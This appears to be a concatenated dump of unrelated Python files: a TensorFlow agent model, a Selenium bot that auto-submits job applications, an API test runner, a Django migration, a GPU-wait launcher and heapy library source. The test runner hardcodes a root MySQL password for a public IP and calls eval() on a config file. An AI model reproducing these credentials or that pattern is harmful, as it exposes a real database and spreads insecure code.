value = tf.nn.tanh(self._value(state))
value = tf.squeeze(value, -1)
if raw_pi:
return policy, value
return tf.nn.softmax(policy), value
# def residual_conv2d(filters, kernel_size, activation=tf.nn.relu, name=None):
# conv1 = layers.Conv2D(
# filters,
# kernel_size,
# padding='same'
# )
# bn1 = layers.BatchNormalization()
# conv2 = layers.Conv2D(
# filters,
# kernel_size,
# padding='same'
# )
# bn2 = layers.BatchNormalization()
# return layers.Lambda(lambda x: activation(tf.add(x, bn2(conv2(activation(bn1(conv1(x))))))), name=name)
# class AgentV2(tf.keras.Model):
# def __init__(self, board_size, hidden_size=256, num_residual_conv=5, dropout=0.0):
# super(Agent, self).__init__()
# self._convolutions = [
# layers.Conv2D(filters=hidden_size, kernel_size=(3, 3), padding='same', activation=tf.nn.relu, name='input_conv')
# ] + [
# residual_conv2d(filters=hidden_size, kernel_size=(3,3), name='residual_conv_%d' % i)
# for i in range(num_residual_conv)
# ]
# self._flatten = layers.Flatten()
# self._dropout = layers.Dropout(dropout)
# self._policy_conv = layers.Conv2D(filters=2, kernel_size=(1,1), name='policy_conv')
# self._bn_policy = layers.BatchNormalization()
# self._value_conv = layers.Conv2D(filters=1, kernel_size=(1,1), name='value_conv')
# self._bn_value = layers.BatchNormalization()
# self._policy = layers.Dense(board_size ** 2, name='policy')
# self._value_hidden = layers.Dense(hidden_size, name='value')
# self._value = layers.Dense(1, name='value')
# def call(self, state, raw_pi=False):
# conv = state
# for conv_layer in self._convolutions:
# conv = self._dropout(conv_layer(conv))
# policy_conv = self._dropout(self._flatten(tf.nn.relu(self._bn_policy(self._policy_conv(conv)))))
# value_conv = self._dropout(self._flatten(tf.nn.relu(self._bn_value(self._value_conv(conv)))))
# policy = self._policy(policy_conv)
# value = self._dropout(tf.nn.relu(self._value_hidden(value_conv)))
# value = tf.nn.tanh(self._value(value))
# value = tf.squeeze(value, -1)
# if raw_pi:
# return policy, value
# return tf.nn.softmax(policy), value
|
994,218 | 6c5ec0bcfa8fcf3def625db3b76f0f991a6df153 | from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.keys import Keys
import os # to get the resume file
import time # to sleep
import get_links
# sample application links if we don't want to run get_links.py
URL_l2 = 'https://jobs.lever.co/scratch/2f09a461-f01d-4041-a369-c64c1887ed97/apply?lever-source=Glassdoor'
URL_l3 = 'https://jobs.lever.co/fleetsmith/eb6648a6-7ad9-4f4a-9918-8b124e10c525/apply?lever-source=Glassdoor'
URL_l4 = 'https://jobs.lever.co/stellar/0e5a506b-1964-40b4-93ab-31a1ee4e4f90/apply?lever-source=Glassdoor'
URL_l6 = 'https://jobs.lever.co/verkada/29c66147-82ef-4293-9a6a-aeed7e6d619e/apply?lever-source=Glassdoor'
URL_l8 = 'https://jobs.lever.co/rimeto/bdca896f-e7e7-4f27-a894-41b47c729c63/apply?lever-source=Glassdoor'
URL_l9 = 'https://jobs.lever.co/color/20ea56b8-fed2-413c-982d-6173e336d51c/apply?lever-source=Glassdoor'
URL_g1 = 'https://boards.greenhouse.io/instabase/jobs/4729606002?utm_campaign=google_jobs_apply&utm_source=google_jobs_apply&utm_medium=organic'
# there's probably a prettier way to do all of this
# test URLs so we don't have to call get_links
URLS = [URL_g1, URL_l4, URL_l3, URL_l6, URL_l8, URL_l9]
# Fill in this dictionary with your personal details!
JOB_APP = {
"first_name": "Foo",
"last_name": "Bar",
"email": "test@test.com",
"phone": "123-456-7890",
"org": "Self-Employed",
"resume": "resume.pdf",
"resume_textfile": "resume_short.txt",
"linkedin": "https://www.linkedin.com/",
"website": "www.youtube.com",
"github": "https://github.com",
"twitter": "www.twitter.com",
"location": "San Francisco, California, United States",
"grad_month": '06',
"grad_year": '2021',
"university": "MIT" # if only o.O
}
# Greenhouse has a different application form structure than Lever, and thus must be parsed differently
def greenhouse(driver):
# basic info
driver.find_element_by_id('first_name').send_keys(JOB_APP['first_name'])
driver.find_element_by_id('last_name').send_keys(JOB_APP['last_name'])
driver.find_element_by_id('email').send_keys(JOB_APP['email'])
driver.find_element_by_id('phone').send_keys(JOB_APP['phone'])
# This doesn't exactly work, so a pause was added for the user to complete the action
try:
loc = driver.find_element_by_id('job_application_location')
loc.send_keys(JOB_APP['location'])
loc.send_keys(Keys.DOWN) # manipulate a dropdown menu
loc.send_keys(Keys.DOWN)
loc.send_keys(Keys.RETURN)
time.sleep(2) # give user time to manually input if this fails
except NoSuchElementException:
pass
# Upload Resume as a Text File
driver.find_element_by_css_selector("[data-source='paste']").click()
resume_zone = driver.find_element_by_id('resume_text')
resume_zone.click()
with open(JOB_APP['resume_textfile']) as f:
lines = f.readlines() # add each line of resume to the text area
for line in lines:
resume_zone.send_keys(line.decode('utf-8'))
# add linkedin
try:
driver.find_element_by_xpath("//label[contains(.,'LinkedIn')]").send_keys(JOB_APP['linkedin'])
except NoSuchElementException:
try:
driver.find_element_by_xpath("//label[contains(.,'Linkedin')]").send_keys(JOB_APP['linkedin'])
except NoSuchElementException:
pass
# add graduation year
try:
driver.find_element_by_xpath("//select/option[text()='2021']").click()
except NoSuchElementException:
pass
# add university
try:
driver.find_element_by_xpath("//select/option[contains(.,'Harvard')]").click()
except NoSuchElementException:
pass
# add degree
try:
driver.find_element_by_xpath("//select/option[contains(.,'Bachelor')]").click()
except NoSuchElementException:
pass
# add major
try:
driver.find_element_by_xpath("//select/option[contains(.,'Computer Science')]").click()
except NoSuchElementException:
pass
# add website
try:
driver.find_element_by_xpath("//label[contains(.,'Website')]").send_keys(JOB_APP['website'])
except NoSuchElementException:
pass
# add work authorization
try:
driver.find_element_by_xpath("//select/option[contains(.,'any employer')]").click()
except NoSuchElementException:
pass
driver.find_element_by_id("submit_app").click()
# Handle a Lever form
def lever(driver):
# navigate to the application page
driver.find_element_by_class_name('template-btn-submit').click()
# basic info
first_name = JOB_APP['first_name']
last_name = JOB_APP['last_name']
full_name = first_name + ' ' + last_name # f string didn't work here, but that's the ideal thing to do
driver.find_element_by_name('name').send_keys(full_name)
driver.find_element_by_name('email').send_keys(JOB_APP['email'])
driver.find_element_by_name('phone').send_keys(JOB_APP['phone'])
driver.find_element_by_name('org').send_keys(JOB_APP['org'])
# socials
driver.find_element_by_name('urls[LinkedIn]').send_keys(JOB_APP['linkedin'])
driver.find_element_by_name('urls[Twitter]').send_keys(JOB_APP['twitter'])
try: # try both versions
driver.find_element_by_name('urls[Github]').send_keys(JOB_APP['github'])
except NoSuchElementException:
try:
driver.find_element_by_name('urls[GitHub]').send_keys(JOB_APP['github'])
except NoSuchElementException:
pass
driver.find_element_by_name('urls[Portfolio]').send_keys(JOB_APP['website'])
# add university
try:
driver.find_element_by_class_name('application-university').click()
search = driver.find_element_by_xpath("//*[@type='search']")
search.send_keys(JOB_APP['university']) # find university in dropdown
search.send_keys(Keys.RETURN)
except NoSuchElementException:
pass
# add how you found out about the company
try:
driver.find_element_by_class_name('application-dropdown').click()
search = driver.find_element_by_xpath("//select/option[text()='Glassdoor']").click()
except NoSuchElementException:
pass
# submit resume last so it doesn't auto-fill the rest of the form
# since Lever has a clickable file-upload, it's easier to pass it into the webpage
driver.find_element_by_name('resume').send_keys(os.getcwd()+"/resume.pdf")
driver.find_element_by_class_name('template-btn-submit').click()
if __name__ == '__main__':
# call get_links to automatically scrape job listings from glassdoor
aggregatedURLs = get_links.getURLs()
print(f'Job Listings: {aggregatedURLs}')
print('\n')
driver = webdriver.Chrome(executable_path='/usr/local/bin/chromedriver')
for url in aggregatedURLs:
print('\n')
if 'greenhouse' in url:
driver.get(url)
try:
greenhouse(driver)
print(f'SUCCESS FOR: {url}')
except Exception:
# print(f"FAILED FOR {url}")
continue
elif 'lever' in url:
driver.get(url)
try:
lever(driver)
print(f'SUCCESS FOR: {url}')
except Exception:
# print(f"FAILED FOR {url}")
continue
# i dont think this else is needed
else:
# print(f"NOT A VALID APP LINK FOR {url}")
continue
time.sleep(1) # can lengthen this as necessary (for captcha, for example)
driver.close()
|
994,219 | 998d4c7a7c9ecfe2a756181481caf5fc9011a9de | #coding=utf-8
import os
import sys
sys.path.append("E:\\jiekou")
from data.get_data import Get_data
from base.demo import RunMain
from util.commen import CommonUtil
from data.dependdent_data import Deppenddent_data
from util.send_mail import SendMail
from redis import *
import json
from pymysql import *
from jsonpath_rw import jsonpath,parse
from util.operation_json import operationJson
class Run_Test():
def __init__(self):
with open("./sheet_id.conf","rb") as f:
conf_info=eval(f.read())
sheet_id=conf_info["sheet_id"]
self.data=Get_data(sheet_id=sheet_id)
self.run=RunMain()
self.com_utl=CommonUtil()
self.send=SendMail()
def go_on_run(self):
pass_count=[]
fail_count=[]
cow_count=self.data.get_base_lines()
for i in range(1,cow_count):
case=self.data.get_caseid(i)
# print("case是%s"%case)
url=self.data.get_url(i)
# print("url是%s" % url)
method=self.data.get_request_method(i)
# print("method是%s" % method)
data=self.data.get_data_for_json(i)
# print("data是%s" % data)
headers = self.data.get_headers_for_json(i)
# print("headers是%s" % headers)
expect=self.data.get_expect_data(i)
# print("except是%s" % expect)
is_run=self.data.get_is_run(i)
dep_case=self.data.is_depend(i)
dep_two=self.data.is_dependTwo(i)
data_fmdat=self.data.get_dat_formata(i)
dep_cookie=self.data.is_dependCook(i)
mysql_expect=self.data.except_mysql(i)
if is_run=="yes":
if dep_case != None:
if method == "post":
# 自己根据redis解决依赖
self.depend_data = Deppenddent_data()
self.depend_data.redis_isIn(dep_case)
dep_value=self.depend_data.get_data_key(i)
# print(" dep_values是%s" %dep_value)
dep_key=self.data.get_depent_files(i)
# print(" dep_key是%s" % dep_key)
dp_case= dep_key.split(":")[0]
if dp_case=="data":
data[dep_key.split(":")[1]]=dep_value
else:
headers["Authorization"]="Bearer "+str(dep_value)
if dep_two!=None:
self.depend_data = Deppenddent_data()
self.depend_data.redis_isIn(dep_two)
dep_value = self.depend_data.get_data_twokey(i)
dep_key = self.data.get_Twodepent_files(i)
dep_len=len(dep_key.split(":"))
header_ordata = dep_key.split(":")[0]
#以下是为了解决a接中返回的值在b接口中是一一对应但不是这个值本身 比如false 在b接口中对应的是1 这样的关系
if header_ordata == "data":
if dep_len==2:
data[dep_key.split(":")[1]] = dep_value
else:
if dep_value==False:
dep_value = 1
else:
dep_value = 2
data[dep_key.split(":")[1]] = dep_value
else:
headers["Authorization"] = "Bearer " + dep_value
if dep_cookie!=None:
self.depend_data = Deppenddent_data()
self.depend_data.redis_isIn(dep_cookie)
# 获取所依赖的a接口headers中的value
dep_value = self.depend_data.get_data_keyCookie(i)
# 获取b接口中的key
dep_key = self.data.get_CookDepent_files(i)
# 将接口b headers中的dep_key=dep_value
headers[dep_key] = dep_value
#老师的方法解决依赖
# self.depend_data = Deppenddent_data(depent_case)
# depend_response_data = self.depend_data.get_data_for_key(i)
else:
self.depend_data = Deppenddent_data()
self.depend_data.redis_isIn( dep_case)
dep_value = self.depend_data.get_data_key(i)
url=url.format(dep_value)
elif dep_cookie!=None:
self.depend_data = Deppenddent_data()
self.depend_data.redis_isIn(dep_cookie)
#获取所依赖的a接口headers中的value
dep_value = self.depend_data.get_data_keyCookie(i)
#获取b接口中的key
dep_key = self.data.get_CookDepent_files(i)
#将接口b headers中的dep_key=dep_value
headers[dep_key]=dep_value
# print("headers是%s" %headers)
res=self.run.run_main(url,method,data_fmdat,data,headers)
res_content=res[0]
res_headers=res[1]
res_content=json.dumps(res_content)
src = StrictRedis()
src.set(case,res_content)
case_headers=case+":headers"
src.set(case_headers,str(res_headers))
res_content=json.loads(res_content)
print(res_content)
if self.com_utl.is_contain(expect,res_content):
#判断是否需要进行数据库中验证
mysql_curso = self.data.rdom(i)
# print("mysql_curso 是%s" %mysql_curso)
if mysql_curso==None:
self.data.write_value(i,"pass")
pass_count.append(i)
else:
conn = connect(host="47.98.179.27", port=3306, user="root", password="Jqdev.Com#123",
database="shouji")
cs1 = conn.cursor()
count = cs1.execute(mysql_curso)
if count==int(mysql_expect):
self.data.write_value(i, "pass")
pass_count.append(i)
else:
self.data.write_value(i, count)
fail_count.append(i)
else:
scend_except=self.data.get_sce_excepet(i)
if scend_except==None:
res_content=str(res_content)
self.data.write_value(i, res_content)
fail_count.append(i)
else:
if self.com_utl.is_contain(scend_except, res_content):
self.data.write_value(i, "pass")
pass_count.append(i)
else:
self.data.write_value(i, res_content)
fail_count.append(i)
#self.send.send_main(pass_count,fail_count)
if __name__=="__main__":
run=Run_Test()
run.go_on_run() |
994,220 | a55d42e485cd5fd921273d029ecafc86975ee353 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.3 on 2017-04-15 08:05
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('resume', '0014_auto_20170413_1507'),
# ('resume', '0014_remove_resume_hireable'),
]
operations = [
]
|
994,221 | 9cb2721c40f8db799579b01f31d58a8054e49439 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import os
import re
import time
import sys
def detectGPU_exec(exec_filename, sleep_second):
exec_return = None
while(exec_return==None):
gpustatus = os.popen("nvidia-smi").read()
gpustatus = gpustatus.replace("\n", "")
pattern = "(\d) TITAN Xp.*?P(\d)" # 匹配cuda_idx 和 是否在使用
res = re.findall(pattern, gpustatus) # dict(str, str)
for cuda_idx, Perf_status in res:
if Perf_status == '0':
# 这里执行我们占用GPU资源的方法
exec_return = os.system("CUDA_VISIBLE_DEVICES=%d python %s" % (int(cuda_idx), exec_filename))
if exec_return != 0:
print("error_id:%d"%(exec_return))
exec_return = None
break
time.sleep(sleep_second)
if __name__=="__main__":
exec_filename = sys.argv[1]
sleep_second = sys.argv[2]
detectGPU_exec(exec_filename, int(sleep_second)) |
994,222 | 8fd41dc279a438251eff5690a9035756b6e748af | from syml_schemas.service.schemas import SymlSchemasService
if __name__ == '__main__':
service = SymlSchemasService()
service.unix_serve()
|
994,223 | 715e0aa3e76a367113d081d420003ef9c03df359 | from functools import reduce
from guppy.etc.Descriptor import property_exp
class UniSet(object):
__slots__ = '_hiding_tag_', 'fam', '_origin_'
_help_url_ = 'heapy_UniSet.html#heapykinds.UniSet'
_instahelp_ = ''
_doc_nodes = """nodes: ImmNodeSet
The actual objects contained in x. These are called nodes because
they are treated with equality based on address, and not on the
generalized equality that is used by ordinary builtin sets or dicts."""
def __and__(self, other):
"""
Return the intersection of self and other.
"""
return self.fam.c_binop('and', self, other)
__rand__ = __and__
def __call__(self, *args, **kwds): return self.fam.c_call(self, args, kwds)
def __contains__(self, other):
"""
Return True if other is a member of self, False otherwise.
"""
return self.fam.c_contains(self, other)
def __eq__(self, other):
"""
Return True if self contains the same elements as other,
False otherwise."""
return self <= other and self >= other
def __hash__(self):
"""
Return an hash based on the kind of the set of self and
the addresses of its elements, if any.
"""
return self.fam.c_hash(self)
def __invert__(self):
"""
Return the complement of self.
"""
return self.fam.c_unop('invert', self)
def __ge__(self, other):
"""
Return True if self is a superset of (and may be equal to) other,
False otherwise.
"""
if self is other:
return True
if not isinstance(other, UniSet):
other = self.fam.c_uniset(other)
return self.fam.c_ge(self, other)
def __gt__(self, other):
"""
Return True if self is a strict (may not be equal to) superset of other.
False otherwise.
"""
return self >= other and not self <= other
def __getattr__(self, other):
"""
Get family-specific attribute.
"""
return self.fam.mod.View.enter(lambda: self.fam.c_getattr(self, other))
def __le__(self, other):
"""
Return True if self is a subset of (and may be equal to) other,
False otherwise.
"""
if self is other:
return True
if not isinstance(other, UniSet):
other = self.fam.c_uniset(other)
return self.fam.c_le(self, other)
def __lshift__(return_spec, argument_spec):
"""
<<This is about to change, does not work as one may expected.
Nov 19 2005. >>>
Return a 'mapping' set, which may be used for specification and test
purposes. It implements the syntax:
return_spec << argument_spec
The elements of the set returned are the callable objects that return
values in return_spec, when called with arguments according to
argument_spec. The return_spec may be any kind of sets that can test
for element containment. The argument_spec may be a set or a tuple. If
it is a set, it should be able to generate some examples, to allow the
mapping to be tested. When argument_spec is a set, the mapping will
have a single argument. Any number of arguments may be specified using
an argument_spec which is a tuple. The arguments are then specified
with sets, that should be able to generate examples. Special features
of the mapping such as optional arguments may be specified in the same
way as when using the 'mapping' function in the Spec.py module.
"""
return return_spec.fam.c_lshift(return_spec, argument_spec)
def __lt__(self, other):
"""
Return True if self is a strict (may not be equal to) subset of other,
False otherwise.
"""
return self <= other and not self >= other
def __mul__(self, other):
"""
Return the cartesian product of self and other, which is the set of
pairs where the first element is a member of self and the second
element is a member of other.
NOTE: Unlike what one might expect from the way the cartesian product
may be defined mathematically, the operation as implemented here is
nonassociative, i.e.
a*b*c == (a*b)*c != a*(b*c)
In the mathematical case, a*b*c would be a set of triples, but here it
becomes a set of pairs with the first element in (a*b) and the second
element in c.
To create sets of triples etc. the cprod() factory function in Spec.py
could be used directly.
"""
if not isinstance(other, UniSet):
other = self.fam.c_uniset(other)
return self.fam.c_mul(self, other)
def __ne__(self, other):
"""
Return True if self does not equal other,
False otherwise. See also: __eq__.
"""
return not self == other
def __bool__(self):
"""
Return True if self contains some element,
False otherwise.
"""
return self.fam.c_nonzero(self)
def __or__(self, other):
"""
Return the union of self and other.
"""
return self.fam.c_binop('or', self, other)
__ror__ = __or__
def __repr__(self):
"""
Return a string representing self. This is usually the same string
as from __str__.
"""
return self.fam.c_repr(self)
def __str__(self):
"""
Return a string representing self. The string is usually the same as the .brief
attribute, but a major exception is the IdentitySet class.
"""
return self.fam.c_str(self)
def __sub__(self, other):
"""
Return the assymetrical set difference. That is, the set of elements
in self, except those that are in others.
"""
if not isinstance(other, UniSet):
other = self.fam.c_uniset(other)
return self.fam.c_sub(self, other)
def __rsub__(self, other):
"""
Return the assymetrical set difference. That is, the
set of elements in other, except those that are in self.
This is like __sub__ except it handles the case when the left
argument is not a UniSet (but convertible to a UniSet).
"""
if not isinstance(other, UniSet):
other = self.fam.c_uniset(other)
return other.fam.c_sub(other, self)
def __xor__(self, other):
"""
Return the symmetrical set difference. That is, the set of elements
that are in one of self or other, but not in both.
"""
if not isinstance(other, UniSet):
other = self.fam.c_uniset(other)
return self.fam.c_xor(self, other)
__rxor__ = __xor__
brief = property_exp(lambda self: self.fam.c_get_brief(self),
doc="""\
A string representation of self, which is brief relative to the
representation returned by __str__ and __repr__. (In many cases it is
the same - both are then brief - but for IdentitySet objects the brief
representation is typically much shorter than the non-brief one.)"""
)
def _get_help(self):
return self.fam.mod._root.guppy.doc.help_instance(self)
doc = property_exp(lambda self: self.fam.mod._root.guppy.etc.Help.dir(self))
def get_ckc(self):
# Get low-level classification information, where available.
# Returns a tuple (classifier, kind, comparator)
return self.fam.c_get_ckc(self)
def _derive_origin_(self, doc):
"""
Return information about the 'origin' of the set. This was intended to be
used for specification purposes - is experimental, noncomplete, temporary.
"""
return self.fam.c_derive_origin(self, doc)
def disjoint(self, other):
"""
Return True if self and other are disjoint sets, False otherwise. This
is equivalent to calculating
(self & other) == Nothing
but may be implemented more efficiently in some cases.
"""
return self.fam.c_disjoint(self, other)
def get_examples(self, env):
"""
Return an iterable object or an iterator, which provides someexamples
of the elements of self. (A minimum of 2 examples should normally be
provided, but it may depend on some test configuration options.)
This is used for automatic test generation from specifications. The
env argument is according to specification of TestEnv in Spec.py,
"""
return self.fam.c_get_examples(self, env)
def get_render(self):
"""
Return a function that may be used to render the representation of the
elements of self. This is mainly intended for internal representation
support.
The function returned depends on the kind of elements self
contains. The rendering function is choosen so that it will be
appropriate, and can be used safely, for all objects of that kind.
For the most general kind of objects, the rendering function will only
return an address representation. For more specialized kinds, the
function may provide more information, and can be equivalent to the
builtin repr() when the kind is narrow enough that it would work for
all elements of that kind without exception.
"""
return self.fam.c_get_render(self)
def test_contains(self, element, env):
"""
Test if self contains the element object. This is used mainly for
internal use for automatic (experimental) testing of specifications.
The env argument is according to specification of TestEnv in Spec.py.
It provides support for things that depends on the specific test
situation, such as a test reporting protocol. If test_contains did
find the element to be contained in self, the method will return
(usually True). But if the element was not contained in self, the
method should call env.failed(message), and return whatever may
be returned; though typically env.failed() would raise an exception.
"""
return self.fam.c_test_contains(self, element, env)
biper = property_exp(lambda self: self.fam.c_get_biper(self),
doc="""\
A bipartitioning equivalence relation based on x. This may be used to
partition or classify sets into two equivalence classes:
x.biper(0) == x
The set of elements that are in x.
x.biper(1) == ~x
The set of elements that are not in x.
""")
dictof = property_exp(lambda self: self.fam.c_get_dictof(self),
doc="""dictof: UniSet
If x represents a kind of objects with a builtin __dict__ attribute,
x.dictof is the kind representing the set of all those dict
objects. In effect, x.dictof maps lambda e:getattr(e, '__dict__') for
all objects e in x. But it is symbolically evaluated to generate a new
symbolic set (a Kind).""")
class Kind(UniSet):
__slots__ = 'arg',
def __init__(self, fam, arg):
self.fam = fam
self._hiding_tag_ = fam._hiding_tag_
self.arg = arg
self._origin_ = None
def alt(self, cmp):
return self.fam.c_alt(self, cmp)
class IdentitySet(UniSet):
__slots__ = '_er', '_partition', '_more'
_help_url_ = 'heapy_UniSet.html#heapykinds.IdentitySet'
def __init__(self, fam):
self.fam = fam
self._hiding_tag_ = fam._hiding_tag_
self._origin_ = None
def __getitem__(self, idx): return self.fam.c_getitem(self, idx)
def __len__(self): return self.fam.c_len(self)
def __iter__(self): return self.fam.c_iter(self)
def __str__(self):
"""
Return a string representating self. This differs from the .brief
attribute in that it is a tabular representation.
...
"""
return self.fam.c_str(self)
def get_rp(self, depth=None, er=None, imdom=0, bf=0, src=None,
stopkind=None, nocyc=False, ref=None):
"""
x.get_rp(depth=None, er=None, imdom=0, bf=0, src=None, stopkind=None,
nocyc=False, ref=None)
Return an object representing the pattern of references to the objects in X.
The returned object is of kind ReferencePattern.
Arguments
depth The depth to which the pattern will be generated. The
default is taken from depth of this module.
er The equivalence relation to partition the referrers.
The default is Clodo.
imdom If true, the immediate dominators will be used instead
of the referrers. This will take longer time to
calculate, but may be useful to reduce the complexity
of the reference pattern.
bf If true, the pattern will be printed in breadth-first
order instead of depth-first. (Experimental.)
src If specified, an alternative reference source instead
of the default root.
stopkind
The referrers of objects of kind stopkind will not be
followed.
nocyc When True, certain cycles will not be followed.
ref
See also
rp (a shorthand for common cases)
"""
return self.fam.RefPat.rp(self, depth, er, imdom, bf, src, stopkind,
nocyc, ref)
def get_shpaths(self, src=None, avoid_nodes=None, avoid_edges=()):
"""x.get_shpaths(draw:[src, avoid_nodes, avoid_edges]) -> Paths
Return an object containing the shortest paths to objects in x.
The optional arguments are:
src:IdentitySet An alternative source set of objects
avoid_nodes:IdentitySet Nodes to avoid
avoid_edges:NodeGraph Edges to avoid
"""
return self.fam.Path.shpaths(self, src, avoid_nodes, avoid_edges)
# 'Normal' methods
def by(self, er):
""" x.by(er) -> A copy of x, but using er for equiv. relation. """
return self.fam.get_by(self, er)
def diff(self, other):
return self.stat - other.by(self.er).stat
def dump(self, *args, **kwds):
""" Dump statistical data to a file
Shorthand for .stat.dump """
self.stat.dump(*args, **kwds)
byclodo = property_exp(lambda self: self.by('Clodo'), doc="""\
A copy of self, but with 'Clodo' as the equivalence relation.""")
byidset = property_exp(lambda self: self.by('Idset'), doc="""\
A copy of self, but with 'Idset' as the equivalence relation.
Note
This is mainly for special purpose internal use. The Id
equivalence relation is more efficient when partitioning large
sets.""")
byid = property_exp(lambda self: self.by('Id'), doc="""\
A copy of self, but with 'Id' as the equivalence relation.""")
bymodule = property_exp(lambda self: self.by('Module'), doc="""\
A copy of self, but with 'Module' as the equivalence relation.""")
byprod = property_exp(lambda self: self.by('Prod'), doc="""\
A copy of self, but with 'Prod' as the equivalence relation.""")
byrcs = property_exp(lambda self: self.by('Rcs'), doc="""\
A copy of self, but with 'Rcs' as the equivalence relation.""")
bysize = property_exp(lambda self: self.by('Size'), doc="""\
A copy of self, but with 'Size' as the equivalence relation.""")
bytype = property_exp(lambda self: self.by('Type'), doc="""\
A copy of self, but with 'Type' as the equivalence relation.""")
byunity = property_exp(lambda self: self.by('Unity'), doc="""\
A copy of self, but with 'Unity' as the equivalence relation.""")
byvia = property_exp(lambda self: self.by('Via'), doc="""
A copy of self, but with 'Via' as the equivalence relation.""")
er = property_exp(lambda self: self.fam.get_er(self), doc="""\
The equivalence relation used for partitioning when representing /
printing this set.""")
count = property_exp(lambda self: len(self.nodes), doc="""\
The number of individual objects in the set.""")
dominos = property_exp(lambda self: self.fam.View.dominos(self), doc="""\
The set 'dominated' by a set of objects. This is the objects that will
become deallocated, directly or indirectly, when the objects in the
set are deallocated.
See also: domisize.""")
domisize = property_exp(lambda self: self.fam.View.domisize(self), doc="""\
The dominated size of a set of objects. This is the total size of
memory that will become deallocated, directly or indirectly, when the
objects in the set are deallocated.
See also: dominos, size.
""")
imdom = property_exp(lambda self: self.fam.View.imdom(self), doc="""\
The immediate dominators of a set of objects. The immediate dominators
is a subset of the referrers. It includes only those referrers that
are reachable directly, avoiding any other referrer.""")
indisize = size = property_exp(lambda self: self.fam.View.indisize(self), doc="""\
The total 'individual' size of the set of objects. The individual
size of an object is the size of memory that is allocated directly in
the object, not including any externally visible subobjects. See also:
domisize.""")
kind = property_exp(lambda self: self.er[self], doc="""\
The kind of objects in the set. The kind is the union of the
element-wise classifications as determined by the equivalence relation
in use by the set.""")
maprox = property_exp(lambda self: MappingProxy(self), doc="""\
An object that can be used to map operations to the objects in self,
forming a new set of the result. The returned object is an instance of
MappingProxy.
This works currently as follows:
o Getting an attribute of the MappingProxy object will get the
attribute from each of the objects in the set and form a set of the
results. If there was an exception when getting some attribute, it
would be ignored.
o Indexing the MappingProxy object will index into each of the objects
in the set and return a set of the results. Exceptions will be
ignored.
Example:
>>> hp.iso({'a':'b'}, {'a':1}).maprox['a'].byid
Set of 2 objects. Total size = 40 bytes.
Index Size % Cumulative % Kind: Name/Value/Address
0 28 70.0 28 70.0 str: 'b'
1 12 30.0 40 100.0 int: 1
>>>
<This is an experimental feature, so the name is intentionally made
mystically-sounding, and is a shorthand for 'mapping proxy'.>""")
more = property_exp(lambda self: self.fam.get_more(self), doc="""\
An object that can be used to show more lines of the string
representation of self. The object returned, a MorePrinter instance,
has a string representation that continues after the end of the
representation of self.""")
all = property_exp(lambda self: self.fam.get_all(self), doc="""\
An object that can be used to show all lines of the string
representation of self.""")
owners = property_exp(lambda self: self.fam.get_owners(self), doc="""\
The set of objects that 'own' objects in self. The owner is defined
for an object of type dict, as the object (if any) that refers to the
object via its special __dict__ attribute.""")
partition = property_exp(lambda self: self.fam.get_partition(self), doc="""\
A partition of the set of objects in self. The set is partitioned into
subsets by equal kind, as given by a equivalence relation. Unless
otherwise specified, the equivalence relation used is 'byclodo', which
means it classifies 'by type or dict owner'. Different
equivalence relations are specified for sets created by the 'by_...'
attributes of any IdentitySet object.
The value is an instance of guppy.heapy.Part.Partition.""")
parts = property_exp(lambda self: self.fam.get_parts(self), doc="""\
An iterable object, that can be used to iterate over the 'parts' of
self. The iteration order is determined by the sorting order the set
has, in the table printed when partitioned.""")
pathsin = property_exp(lambda self: self.get_shpaths(self.referrers), doc="""\
The paths from the direct referrers of the objects in self.""")
pathsout = property_exp(lambda self: self.referents.get_shpaths(self), doc="""\
The paths to the referents of the objects in self.""")
referents = property_exp(lambda self: self.fam.View.referents(self), doc="""\
The set of objects that are directly referred to by any of the objects
in self.""")
referrers = property_exp(lambda self: self.fam.View.referrers(self), doc="""\
The set of objects that directly refer to any of the objects in self.""")
rp = property_exp(get_rp, doc="""\
rp: ReferencePattern
An object representing the pattern of references to the objects in X.
See also
get_rp""")
shpaths = property_exp(get_shpaths, doc="""x.shpaths: Paths
An object containing the shortest paths to objects in x.
Synonym
sp
See also
get_shpaths""")
shpaths = property_exp(get_shpaths, doc="""x.sp: Paths
An object containing the shortest paths to objects in x.
Synonym
sp
See also
get_shpaths""")
sp = property_exp(get_shpaths, doc="""x.sp: Paths
An object containing the shortest paths to objects in x.
Synonym
shpaths
See also
get_shpaths""")
stat = property_exp(lambda self: self.partition.get_stat(), doc="""\
x.stat: Stat
An object summarizing the statistics of the partitioning of x. This is
useful when only the statistics is required, not the objects
themselves. The statistics can be dumped to a file, unlike the set of
objects itself.""")
theone = property_exp(lambda self: self.fam.get_theone(self), doc="""\
theone: Anything
The one object in a singleton set. In case the set does not contain
exactly one object, the exception ValueError will be raised.
""")
prod = property_exp(lambda self: self.fam.get_prod(self), doc="""\
theone: MorePrinter
The traceback for the producer for the one object in a singleton set.
""")
class IdentitySetMulti(IdentitySet):
__slots__ = 'nodes',
def __init__(self, fam, nodes):
super().__init__(fam)
self.nodes = nodes
class IdentitySetSingleton(IdentitySet):
__slots__ = '_node',
_help_url_ = 'heapy_UniSet.html#heapykinds.IdentitySetSingleton'
def __init__(self, fam, node):
super().__init__(fam)
self._node = node
# RefPat (eg) depends on this being usable as a hashable key.
nodes = property_exp(lambda self: self.fam.immnodeset((self._node,)), doc="""\
x.nodes: ImmNodeSet
The actual objects contained in x. These are called nodes because they
are treated with equality based on address, and not on the generalized
equality that is used by ordinary builtin sets or dicts.""")
def _get_theone(self):
return self._node
theone = property_exp(_get_theone)
class EquivalenceRelation(UniSet):
"""\
An equivalence relation is a binary relation between two elements of a
set which groups them together as being "equivalent" in some way.
An equivalence relation is reflexive, symmetric, and transitive. In
other words, the following must hold for "~" to be an equivalence
relation on X:
* Reflexivity: a ~ a
* Symmetry: if a ~ b then b ~ a
* Transitivity: if a ~ b and b ~ c then a ~ c.
An equivalence relation partitions a set into several disjoint
subsets, called equivalence classes. All the elements in a given
equivalence class are equivalent among themselves, and no element is
equivalent with any element from a different class.
"""
__slots__ = 'classifier', 'erargs'
_help_url_ = 'heapy_UniSet.html#heapykinds.EquivalenceRelation'
def __init__(self, fam, classifier, erargs=()):
self.fam = fam
self._hiding_tag_ = fam._hiding_tag_
self.classifier = classifier
self.erargs = erargs
self._origin_ = None
def __getitem__(self, idx):
return self.fam.c_getitem(self, idx)
def _get_dictof(self):
